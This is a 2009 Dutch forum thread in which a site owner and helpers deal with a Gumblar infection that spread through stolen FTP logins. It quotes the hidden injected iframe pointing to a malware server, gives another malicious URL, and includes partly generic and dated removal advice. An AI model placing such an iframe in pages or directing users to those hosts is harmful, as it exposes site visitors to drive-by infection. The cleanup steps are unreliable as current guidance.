Vanochtend wilde ik een foto van mn website linken, maar de betreffende simpleviewer-gallery deed het niet. Er stond dat ik Macromedia flash moest downloaden of doorklikken naar de gallery. Beide opties geprobeerd en het hielp allebei niet.
Daarna kreeg ik ineens meldingen van mijn virusscanner (avast) dat er een worm/virus op mijn site zit.
File name: http://fotoleonie.nl/\{gzip}
Mailware name: HTML:Iframe-inf
Malware type: Virus/worm.
Dus
Als ik mn website bezoek (met de virusscanner uit, ja niet zo slim misschien achteraf) ziet ie er helemaal raar uit, beginplaatje is weg, links openen in nieuwe tab enzo...
Ik kijk net in de bron van mn site en er staat een regel die ik niet ken:
| 1 |
Zou dit het probleem zijn? En zo ja, hoe komt dat op mijn site?
[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 12:36:38 ]
Gaat je virusscanner dan ook stoer doen?
Hij klaagt namelijk wel over een iframe
Vreemd virus op mijn website?
IP's blokkeren op ftp server
Joomla als CMS?
quote:Die pagina doet niks bij mij. Niet openen, maar mn scanner zegt ook niks.Op maandag 10 augustus 2009 @ 00:58 schreef Juicyhil het volgende:
En als je naar deze pagina gaat: http://zdlz.in:8080/index.php
Gaat je virusscanner dan ook stoer doen?
Hij klaagt namelijk wel over een iframe
quote:ArghOp maandag 10 augustus 2009 @ 00:59 schreef mistermaniac het volgende:
Je bent niet de enige:
Vreemd virus op mijn website?
IP's blokkeren op ftp server
Joomla als CMS?
Ik lees het eerste topic en ik moet bijna janken
Gadverdamme
Nee, geen Joomla trouwens, een vriend heeft de website gemaakt in Dreamweaver en ik heb vorige week wat gewijzigd in Nvu.
Een vriendin met hetzelfde hostingbedrijf heeft hetzelfde probleem trouwens, dus het lijkt erop dat dit:
quote:misschien het probleem kan zijnOp maandag 13 juli 2009 @ 20:42 schreef AquaMaryn het volgende:
Als jij die index er zelf niet neer hebt gezet, komt het van de server van je webhosting af. Zou in dat geval even contact opnemen met ze, want dat is nogal lomp...
Ik ga deze stappen maar volgen!
MM had er ook last van.Mac gescant, geen virus. Dus dan kan het enkel de pc op zn werk zijn. ww veranderd, en tot nu toe niet weer gehad. Maar het is mooi kut, want het jat ALLE ftp gegevens.
Maar het lijkt nu weg te zijn
Veel last van hier (ISP) ff je FTP gegevens wijzigen..
quote:Dat gaat dus enkel werken als je ook het virus verwijderdOp maandag 10 augustus 2009 13:59 schreef St4ck3r het volgende:
Gumblar virus!
Veel last van hier (ISP) ff je FTP gegevens wijzigen..
anders dan blijft het terug komen. Nou, morgen alle stappen maar weer volgen
), je backup terug zetten, je ftp wachtwoord wijzigen.Hier gelukkig geen virus aangetroffen, dus de ellende van het verwijderen/formatten hebben we niet gehad.
quote:Ik las het op 3 websites. Te belachelijk ookOp dinsdag 11 augustus 2009 11:13 schreef MissBliss het volgende:
Format? Neeeeeeeeeeeeeeeeeeeee!
1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)
2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.
3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.
4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.
ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
Ik zit nu dus weer te scannen, maar avast heeft voorlopig nog niks gevonden. Misschien een andere virusscanner proberen.
Ik weiger vooralsnog te formatteren
quote:Oh, dit ga ik zo wel even doen dan.Op dinsdag 11 augustus 2009 @ 11:30 schreef Qwea het volgende:
Gumblar gebruikt FTP-logins om zichzelf verder te verspreiden. Om de infectie van deze nieuwe malwarekampioen op te sporen, kunnen er een aantal stappen worden genomen:
1. Zoek het bestand sqlsodbc.chm in de systeemfolder van Windows. (Bij XP is de locatie C:\Windows\System32\)
2. Zoek de Sha1 van sqlsodbc.chm. Dit kan met FileAlyzer.
3. Vergelijk daarna de verkregen Sha1 met de lijst van ScanSafe.
4. Als de Sha1 en de grootte van het bestand niet overeenkomen zou sprake kunnen zijn van een Gumblar infectie.
ScanSafe heeft echter een radicaler advies. Het raadt een format van de harde schijf en een herinstallatie van Windows (en alle applicaties) aan als de meest effectieve manier om de Gumblar te bestrijden. Ook is het raadzaam om alle wachtwoorden te vervangen.
En als avast niks vindt, probeer dan eens de online scan van mcafee ofzo
quote:Firstly, find another computer that is not infected. Go to your host’s control panel and change the password. If you are running a database driven site, change your database user passwords too. Backup your database – it is not clear at the moment if the database is at risk. Then, the safest option, is to delete everything in your public_html directory (or equivalent) plus html files in the tmp/webalizer and tmp/awstats directories. Ok, you lose you stats, this is not the end of the world though.
On your computer install Avast. Update Windows. If you struggle to get to the website, that’s the virus blocking you. Download from another pc, copy to media, then install from there. Update and run, run in safe mode, clear you temp data (CCleaner has always been handy for this) and run it again. Make sure you pc is clear. Reboot and run again (in case pesky virus hides and returns on reboot). Ah, before doing all that, disable Windows Restore and ensure all restore points are trashed (should be automatic).
When you computer is clear, you should be ok. As a precaution, delete all FTP passwords from all applications (even the ones you forgot about/tested years ago). I suggest that web masters stop saving FTP data on their pc’s completely. Better safe than very very sorry. Remember, Dreamweaver, Link Crawlers and Site Map generators, Photo Editors, Album Creaters and even some notepad tools (like PSPad) store FTP information.
quote:Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannenTo remove Gumblar, you must first stop any Gumblar processes that are running in your computer's memory. To stop all Gumblar processes, press CTRL+ALT+DELETE to open the Windows Task Manager. Click on the "Processes" tab, search for Gumblar, then right-click it and select "End Process" key.
To delete Gumblar registry keys, open the Windows Registry Editor by clicking on the Windows "Start" button and selecting "Run." Type "regedit" into the box and click "OK." Once the Registry Editor is open, search for the registry key "HKEY_LOCAL_MACHINE\Software\Gumblar." Right-click this registry key and select "Delete."
Finally, to completely get rid of Gumblar, you must manually remove other Gumblar files. These Gumblar files can be in the form of EXE, DLL, LSP, TOOLBAR, BROWSER HIJACK, and/or BROWSER PLUGIN. For example, Gumblar might create a file like
%PROGRAM_FILES%\Gumblar\Gumblar.exe. Locate and remove these files.
) vastgelopen, nu scant ie weer, maar hij is pas op 58%.Ik probeer dat McAfee ook wel!
Ja, we hebben idd een netwerk
Yay.quote:Oh dit wordt een dagtaakOp dinsdag 11 augustus 2009 @ 11:38 schreef Qwea het volgende:
nog een stukje
[..]
Heb je trouwens je computers in een netwerk gedeeld staan MB? Want dan kun je alle andere pc's ook gaan scannen
quote:Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.Op dinsdag 11 augustus 2009 11:41 schreef MissBliss het volgende:
Avast heeft vannacht gescand, maar hij is (weer
Ik probeer dat McAfee ook wel!
Ja, we hebben idd een netwerk
[..]
Oh dit wordt een dagtaak
quote:Ja, dat ga ik zo maar doen.Op dinsdag 11 augustus 2009 @ 11:42 schreef Qwea het volgende:
[..]
Start je comps op in safe mode, en ga vanuit daar scannen. En ik zou persoonlijk alles even van het netwerk loskoppelen dmv de stekkers eruit te trekken. Allemaal in safe mode opstarten, en gaan scannen.
Naja, Re heeft 1 vd laptops mee naar zn werk
Ik zal hem even bellen Gebeld: hij is ook geinfecteerd
[ Bericht 6% gewijzigd door MissBliss op 11-08-2009 11:58:59 ]
quote:Op dinsdag 11 augustus 2009 11:46 schreef MissBliss het volgende:
[..]
Ja, dat ga ik zo maar doen.
Naja, Re heeft 1 vd laptops mee naar zn werk
Gebeld: hij is ook geinfecteerd
Heeft hij die laptop ook op het bedrijsnetwerk aangesloten? Dan mogen ze wel snel actie ondernemen Ze wisselen wel mooi af met linkjes
quote:jaOp dinsdag 11 augustus 2009 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
hier waren er ook 2 verchillende. 1 naar .ru en 1 naar .in . En het waren totaal andere linkjes.Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
quote:Dat heb ik al gezegd ja.
[..]
quote:Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou wasOp dinsdag 11 augustus 2009 @ 12:02 schreef St4ck3r het volgende:
<iframe src="http://c6h.at:8080/ts/in.cgi?pepsi138" width=125 height=125 style="visibility: hidden"></iframe>
Ze wisselen wel mooi af met linkjes
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem Scan
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
quote:Bij MM op het werk issie ookOp dinsdag 11 augustus 2009 12:10 schreef MissBliss het volgende:
[..]
Dat heb ik al gezegd ja.
[..]
Haal je dat nu van mijn site? Ik zou er niet heen gaan als ik jou was
Vandaar dat MM hem op zijn site ook had. Complete chaos quote:Het is mn eigen computer ja. Ik durf dit nietOp dinsdag 11 augustus 2009 @ 12:11 schreef CantFazeMe het volgende:
Als je nog niet geformatteerd heb kan ik je misschien nog helpen. Formatteren altijd als een laatste optie houden. Maar het Gumblar (een redirect virus) spreidt zich inderdaad via websites en FTP. Je hoeft deze onderstaande stappen niet te volgen. (Is dit je eigen computer?) Alle tools op eigen risico.
Stap 1:
Download Trend Micro HijackThis
http://www.trendsecure.co(...)ity_tools/hijackthis
Systeem ScanOpen HijackThis. Klik op “Do a systemscan and save a logefile” Een nieuw venster in kladblok komt te voorschijn; “hijackthis.log” Kopieer de gehele log. Kopieer en plak deze log en zet het in je volgende reply. Na het kopieren van de log het programa afsluiten.
Er zijn nog meerdere stappen zodra ik je HijackThis log heb bekeken.
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
quote:call gelogd bij helpdesk, responsetijd 3 uurOp dinsdag 11 augustus 2009 12:03 schreef Qwea het volgende:
[..]
ja
Ik vraag me af, hoe dit concreet opgelost gaat worden.
Zoals bovenstaand scenario.. als RE de laptop op het bedrijfsnetwerk heeft aangesloten, worden al die website's geinfecteerd... iedereen die die site's bezoekt, krijgt hem ook...
Ga je dat ooit stoppen?
, dus ik merk het welquote:3u?Op dinsdag 11 augustus 2009 12:20 schreef Re het volgende:
[..]
call gelogd bij helpdesk, responsetijd 3 uur
dat zijn ze schromelijk te laat ws Ik zou dan ook gelijk aangeven dat ze de website's na moeten lopen die gehost worden bij je werk. En alle andere comps in het netwerk
quote:Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
quote:Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
quote:Op dinsdag 11 augustus 2009 @ 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
Re had het toevallig wel van de week over: zullen we een nieuwe computer kopen? Dus wie weet
quote:Nee, dan blijf ik er vanaf!
[..]
Klopt. Zolang dat virus nog actief is in je netwerk/ op je pc.. kun je veranderen wat je wilt maar dat gaat geen ruk helpen.
Het wachtwoord wordt nou veranderd door dizer, maar jij kan niet inloggen op de servers meer... niet eerder dan je pc's schoon zijn, anders begin je weer van vooraf aan
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
quote:Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
quote:Flash en adobe reader.Op dinsdag 11 augustus 2009 12:23 schreef Dizer het volgende:
[..]
Het virus dat zich zogenaamd verspreidt via Flash is wel redelijk bizar verhaal. Ik ga er aan werken.
Zo te zien kan PCExtreme er wel wat aan doen, maar dan moet ik even wat het een en ander doen. Eerst beginnen met de ww's wijzigen.
Weer een reden om over te stappen op Apple
quote:Wat doet Gumblar?
Het doel van de malware is om zoveel mogelijk computers te besmetten en gevoelige informatie van de deze computers te stelen. Gumblar gaat na infectie van een computer op zoek naar zogenaamde FTP-inloggegevens. FTP wordt vaak gebruikt om websites te updaten. Deze gegevens worden door Gumblar gebruikt om toegang te krijgen tot de content van allerlei (goed bedoelde) websites. Webpagina's van deze sites worden vervolgens aangepast. Bezoek je zo’n site, dan krijg je deze nieuwe malware aangeboden. Dit gebeurt opnieuw via de kwetsbare plekken in Adobe PDF Reader en Adobe Flash wanneer je zo'n website bezoekt. Op deze manier worden computers geïnfecteerd met de Gumblar code.
Ook worden er aanpassingen gedaan in Internet Explorer, de webbrowser. Deze aanpassingen zorgen ervoor dat zoekresultaten in Google worden gemanipuleerd en verwijzen naar sites waarmee malware verspreid wordt.
Naast het manipuleren van Google-zoekresultaten en het stelen van FTP-inloggegevens zal een besmette computer:
quote:Ik vraag me af waarom vista niet.Affected Platforms:
The malware affecting PCs targets prevalent Microsoft platforms:
* Microsoft Windows 2000
* Microsoft Windows XP
* Microsoft Windows Server 2003
overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten
Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
quote:Dat ding kan zich werkelijk overal hebben ingenesteld.Op dinsdag 11 augustus 2009 12:26 schreef MissBliss het volgende:
[..]
Nee, dan blijf ik er vanaf!
Oh ja, wat ik wilde vragen: ik heb 2 versies van de site op mn pc staan, 1 op C en 1 op J. Ik upload hem altijd vanaf J. Is dan de kans groot dat het virus op J staat? Daar staan alleen foto's, muziek en die website dus, geen systeemdingen.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
quote:Nee, dat dan weer niet.
[..]
Dat ding kan zich werkelijk overal hebben ingenesteld.
Doe een ctrl + alt + del... staat daar eigk een proces met iets als " gumblar" ?
quote:Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe nietOp dinsdag 11 augustus 2009 12:32 schreef MissBliss het volgende:
Ok, ook niet meer googlen in IE dus
Zal je zien, ben ik er straks na 100 jaar eindelijk vanaf, ga ik per ongeluk naar een besmette site en gebeurt het weer opnieuw
quote:Oh sorryOp dinsdag 11 augustus 2009 @ 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ik zal de link uit de OP halen!
quote:Download ff avast. Ik snap het niet he...Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan
terwijl hier gelijk mijn pc ging lopen schreeuwen " BAD IFRAME! VIRUS! TROJAN!" quote:Ok.Op dinsdag 11 augustus 2009 @ 12:34 schreef Qwea het volgende:
[..]
Neh, je hebt avast toch? Die gaf gisteren flink lawaai toen ik op een besmette site kwam. Gewoon dan kiezen voor connectie afbreken... dan laad het iframe niet
Je weet nu immers wat het probleem precies is.Ik zeg maar wat hoor
quote:Ja, goed idee!Op dinsdag 11 augustus 2009 @ 12:36 schreef Qwea het volgende:
MB? Is het handig om de TT te wijzigen?
Ik zeg maar wat hoor
Zal ik het zelf doen?
quote:Ooh, en zet je internet beveiliging van avast (iets met surfen ofzo in de instellingen) op hoog
I did it 
quote:je bent toch niet voor jan snot modOp dinsdag 11 augustus 2009 12:37 schreef MissBliss het volgende:
[..]
Ja, goed idee!
Zal ik het zelf doen?
Loopt avast nog steeds vast nu je veilige modus hebt gedaan?
79% nu, daarna ga ik wel even die online scanner proberen.
quote:Hij hoeft ook niet perse op jouw pc te staan
Hij kan ook op die van RE staan... want toegang tot netwerk.quote:Handig om daar op te klikken..Op dinsdag 11 augustus 2009 12:34 schreef Litso het volgende:
Ouch, ik las de OP en dacht 'ff de site bekijken'. Mn pc is direct gecrashed, en ik zit op werk (internetbedrijfje). Ik hoop dat de virusscanner hier z'n werk doet, anders heb ik een probleem
Overigens heb ik ervaren dat Malwarebytes Anti-Malware (vrij klein en gratis) erg goed werkt tegen deze hardnekkige dingen. Maar goed dit is ook nieuw voor me. Gelukkig zit ik nu op m'n Apple'tje werken..
[ Bericht 3% gewijzigd door Mr.Noodle op 11-08-2009 12:55:34 ]
ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
quote:Oh
[..]
Hij hoeft ook niet perse op jouw pc te staan
quote:Ok.Op dinsdag 11 augustus 2009 12:18 schreef MissBliss het volgende:
[..]
Het is mn eigen computer ja. Ik durf dit niet
Net belde Dizer (die heeft de site gemaakt), hij heeft pcextreme gebeld (site van die vriendin van mij die het ook heeft is daar ook gehost) maar die snappen er ook niks van.
Hij gaat iig op zijn schone computer de wachtwoorden enzo veranderen, want ik ben bang dat als ik het doe, het virus het zo weer gevonden heeft
Updaten en scannen met Malwarebytes' Anti-Malware
Update Malwarebytes' Anti-Malware
quote:Op dinsdag 11 augustus 2009 12:47 schreef Re het volgende:
homepage is iig veranderd naar goolge
ik krijg allemaal genereic FakeAlert.d!gen waarschuwingen, verder is er nog een sys.exe geinfecteerd waar de virusscan hier op kapotgaat:')
! En die helpdesk is nog steeds niet langs geweest?Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
quote:Das het mooie van een netwerk. Stel je heb 500 comps in dat netwerk, en 1 van die 500 is besmet, dan kan dat virus bij alles van het netwerk. Dus ook bij de ftp gegevens.
quote:Ga ik doen zodra avast klaar isOp dinsdag 11 augustus 2009 @ 13:03 schreef CantFazeMe het volgende:
Probeer dit dan maar.
Updaten en scannen met Malwarebytes' Anti-MalwareStart MalwareBytes AntiMalware (Vista gebruikers > rechtermuisknop kies uitvoeren als Admin). Draai Malwarebytes' Anti-Malware niet in safemode, dan anders aangegeven.
Update Malwarebytes' Anti-MalwareSelecteer de "Update" tab. Klik op "Controleer Updates". Wanner het updaten klaar is, selecteer de "Scanner" tab. Klik "Volledige Scan". Wanneer het scannen voltooid is, klik op "OK", en ga naar de resultaten lijst. Bij de resultatenlijst, selecteer alles en klik op "Verwijderen". Na een succesvolle scan, een log zal automatisch worden geopend in Notepad. Kopieer en plak deze log en zet het in je volgende reply. Klik je de log om de één of andere reden weg, dan kun je hem hier weer vinden: C:\Documents and Settings\[gebuikersnaam]\Application Data\Malwarebytes\Malwarebytes' Anti-Malware\Logs
81% nu.
aVast doet hier trouwens niet veel tegen..
quote:Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.Op dinsdag 11 augustus 2009 13:09 schreef Mr.Noodle het volgende:
Als ze gewoon even in heel het netwerk even Malwarebytes anti-malware installeren om het te detecteren en te verwijderen. Proces kan alleen wel enige uren duren als het voor meerdere machines geldt.
aVast doet hier trouwens niet veel tegen..
Maar het is een zeer goed programma.
quote:Die is toch ook actiefOp dinsdag 11 augustus 2009 13:11 schreef CantFazeMe het volgende:
Malwarebytes werkt alleen als er een virus/trojan actief is het is geen actieve scanner. (Het kan wel, maar dan moet je ervoor betalen.)
Maar het is een zeer goed programma.
quote:Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
quote:Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.Op dinsdag 11 augustus 2009 13:15 schreef CantFazeMe het volgende:
[..]
Ja, ik bedoel proactieve bescherming (voorkomen van binnendringen systeem) daarvoor moet je betalen. (optioneel natuurlijk.) (beschermingsmodule) de rest is allemaal gratis.
Voor gewone bescherming draait ze op dr eigen pc avast.
Wat draai je eigenlijk op die andere machines MB?
(Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.
Nu ga ik dat malwarebytes eens proberen.
quote:De minilaptop heeft AVG (heet dat zo?) en die van Re weet ik niet. Minilaptop heb ik nog niet aangehad, nog geen zin inOp dinsdag 11 augustus 2009 @ 13:17 schreef Qwea het volgende:
[..]
Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.
Voor gewone bescherming draait ze op dr eigen pc avast.
Wat draai je eigenlijk op die andere machines MB?
quote:Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelichtOp dinsdag 11 augustus 2009 12:35 schreef Qwea het volgende:
[..]
Download ff avast. Ik snap het niet he...
Ook op MikeyMo zn werk... ze hebben daar virusscanners... en geen enkele is afgegaan
quote:aVast doet dan half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.Op dinsdag 11 augustus 2009 13:11 schreef Qwea het volgende:
[..]
Until a few days ago, the only anti-virus software to detect and cage the virus was Avast! (one of the free ones!). Systemic, Norton and co were clueless.
quote:verwijder ze in veilige modus? Hier ook wel eens gehad... en dan doettie het wel.Op dinsdag 11 augustus 2009 13:17 schreef MissBliss het volgende:
Avast is klaar, niks gevonden
(Alleen 3 foto's die niet te scannen zijn, die zijn ook niet te verwijderen, heel raar, maar dat is al langer dus zal hier wel niks mee te maken hebben.
Nu ga ik dat malwarebytes eens proberen.
quote:aahOp dinsdag 11 augustus 2009 13:19 schreef Mr.Noodle het volgende:
[..]
aVast doet half werk, hij verwijderd het virus, maar laat de backup voorziening staan. Gevolg is bij reboot van de computer dat het virus zich uiteindelijk weer terug zet via het Windows Register en verborgen bestand ergens op de HD. Kun je weer scannen en hetzelfde proces opnieuw blijven doen. Dan blijf je bezig.
oke. Kijk, das nieuw voor moi. Maar je kan de backup toch handmatig verwijderen?Trouwens MB, die malware bytes, voer die idd even op je gehele netwerk uit en niet enkel op je eigen pc.
quote:Op dinsdag 11 augustus 2009 13:17 schreef Qwea het volgende:
[..]
Ja, maar dat is helemaal niet nodig. Het enige wat dat ding moet doen, is die gumblar verwijderen. Aangezien hij al actief is. En dat is gewoon gratis.
Voor gewone bescherming draait ze op dr eigen pc avast.
Wat draai je eigenlijk op die andere machines MB?
Dat bedoel ik dus.
(lets go back ontopic.)quote:Avast zou ik sowieso als virusscanner gebruiken, maar aangezien die bij MB niks vindt, probeer ook ff die malware bytessOp dinsdag 11 augustus 2009 13:19 schreef Litso het volgende:
[..]
Ben m aan het downloaden. Sophos vond niks, maar ik weet niet of die er al van op de hoogte is. Ik heb de helpdesk meteen maar ff ingelicht
Avast is tot nu toe de enige die ik heb meegemaakt die je weghaald bij de bad iframes. De rest geeft geen kick
quote:Dat weet ik welOp dinsdag 11 augustus 2009 13:21 schreef CantFazeMe het volgende:
[..]
Dat bedoel ik dus.
je zei het alleen zo moeilijk Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
quote:Ik persoonlijk zou het heel omslachting doen (thats my middle nameOp dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen
Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
) en die malware bytes op een schijfje zetten en individueel op alle pc's draaien .quote:Netwerk scannen heeft niet echt veel zin als andere PC's ook Windows draaien. Trojans/virussen/malware nestelen zich 99% op de schijf waar Windows op geïnstalleerd is, meestal is dat door andere gebruikers niet toegankelijk via het netwerk. Tenzij de Admin erbij kan komen...Op dinsdag 11 augustus 2009 13:23 schreef MissBliss het volgende:
Even opnieuw opstarten, de J schijf is verdwenen
Hoe moet ik het netwerk scannen dan? De gedeelde schijven?
Rest alleen dat er op elke computer dat progje geïnstalleerd moet worden. Maar goed, kijk eerst even of het bij jezelf werkt voordat je aan de rest begint..
quote:Ok maar begrijp ik hieruit dat:
[..]
[..]
Flash en adobe reader.
[..]
[..]
Ik vraag me af waarom vista niet.
overigens, wat moet PCextreme hieraan doen? Als je gewoon de nieuwe adobe's hebt... loop je geen risico. PCE kan moeilijk adobe voor je gaan updaten
Trouwens, ik ben wel benieuwd naar de root login log van PC extreme. Kun je daaraan komen?
Je besmet bent.
Je de virus weghaald.
Je website vernieuwd
Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?
Wat is het leven toch heerlijk met een Mac
.quote:Ja. Als je het virus weghaalt, en je hebt een scanner die niet de bad iframes detecteerd (norton deed dat dus mooi niet gisteren) dan raak je opnieuw infected als je bv pietjepuk.nl bezoekt en die is besmet. Avast die ik heb, geef complete alarm bellen en dan heb je de keuze tussen doorgaan (en dus besmet worden) of de connectie afbreken zodat het iframe niet geladen wordtOp dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:
[..]
Ok maar begrijp ik hieruit dat:
Je besmet bent.
Je de virus weghaald.
Je website vernieuwd
Je alsnog nog een keer besmet kan raken omdat je een website hebt bezocht die alsnog besmet is?
Wat is het leven toch heerlijk met een Mac
quote:mja, netwerk is hier wel redelijk goed beveiligd, hangen 25.000 computers aan ofzo, laptop ligt nu bij ITOp dinsdag 11 augustus 2009 13:03 schreef Qwea het volgende:
[..]
Ik hoop stiekem dat je slim bent geweest en je laptop uit het netwerk hebt getrokken?
Dat geeft avast dus aan... als er een bad iframe is
quote:Maar je wilt niet weten hoeveel mensen die zooi nog gebruiken. Nieuwe comps worden grotendeels met mcafee geleverd.Op dinsdag 11 augustus 2009 13:35 schreef Mr.Noodle het volgende:
Norton en Mcafee zijn ook logge verouderde rukprogramma's die gewoon niet voorbereid zijn op de nieuwere soorten virussen en dus hard achterlopen, maar dit was al een jaartje of 8 zo.
Donderdag nieuwe laptop gehaald ; mcafee zat erop
Gelijk er maar afgelikkerd.
quote:Nee, in adobe dus. Want via adobe komt het binnen.Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?
quote:Ja, het scheelt je iig (tot nu toe) dit soort frustraties..Op dinsdag 11 augustus 2009 13:27 schreef Dizer het volgende:
[..]
Wat is het leven toch heerlijk met een Mac
quote:Via de Adobe plugins waarvan je browser gebruik maken..Op dinsdag 11 augustus 2009 13:37 schreef Swetsenegger het volgende:
Maar die moet dan toch gebruik maken van een enorm gat in je browser?
quote:Dat dus iddOp dinsdag 11 augustus 2009 13:39 schreef Mr.Noodle het volgende:
[..]
Via de Adobe plugins waarvan je browser gebruik maken..
Nou snap ik nog steeds niet waarom vista er niet bij staat. Als infected platforms
quote:Ok
[..]
Ik persoonlijk zou het heel omslachting doen (thats my middle name
Ja goed idee wel
Oh, minilaptop heeft geen cd-romstation, kijken of het op een usb-stick past
quote:Ja?Op dinsdag 11 augustus 2009 @ 13:26 schreef Qwea het volgende:
aah, er is druk iemad bezig met je site weer ok te maken zie ik
Ik durf er niet meer te kijken
sorry..
quote:Nou is het duidelijk dat het ftp gegevens steelt... maar in het stukje hier boven staat " wachtwoorden en gebruikers namen" dus dat geldt ook voor e-mail e.d?Nieuwe kampioen
